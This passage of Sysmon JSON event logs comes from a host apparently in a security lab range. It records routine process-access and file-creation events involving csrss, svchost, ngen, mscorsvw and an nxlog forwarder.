{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.888\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00103D071200}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.888","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00103D071200}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.888\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00103D071200}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.888","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00103D071200}","TargetProcessId":"2908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:42.091\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:42.091","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:43.091\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:43.091","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:43.326\r\nProcessGuid: {E2A3D6B1-13CD-5F25-0000-00103D071200}\r\nProcessId: 2908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b5c-0\\System.Runtime.Serialization.dll\r\nCreationUtcTime: 2020-08-01 07:03:43.326","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:43.326","ProcessGuid":"{E2A3D6B1-13CD-5F25-0000-00103D071200}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b5c-0\\System.Runtime.Serialization.dll","CreationUtcTime":"2020-08-01 07:03:43.326","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:43.388\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CF-5F25-0000-0010370D1200}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:43.388","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CF-5F25-0000-0010370D1200}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:43.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CF-5F25-0000-0010370D1200}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:43.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CF-5F25-0000-0010370D1200}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:43.404\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CF-5F25-0000-0010370D1200}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:43.404","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CF-5F25-0000-0010370D1200}","TargetProcessId":"4496","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:44.029\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13D0-5F25-0000-00105C121200}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 